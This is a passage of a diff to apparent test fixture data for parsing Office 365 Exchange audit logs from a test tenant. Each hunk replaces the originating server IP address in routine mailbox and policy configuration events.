"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -134,7 +134,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -208,7 +208,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -220,7 +220,7 @@ "Operation": "Install-DefaultSharingPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", 
@@ -242,7 +242,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -254,7 +254,7 @@ "Operation": "Install-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", 
@@ -276,7 +276,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -288,7 +288,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", 
@@ -314,7 +314,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -326,7 +326,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Arbitration", 
@@ -356,7 +356,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -368,7 +368,7 @@ "Operation": "Set-OwaMailboxPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "InstantMessagingType", 
@@ -390,7 +390,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -402,7 +402,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -476,7 +476,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -488,7 +488,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -562,7 +562,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -574,7 +574,7 @@ "Operation": "Enable-AddressListPaging", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DoNotUpdateRecipients", 
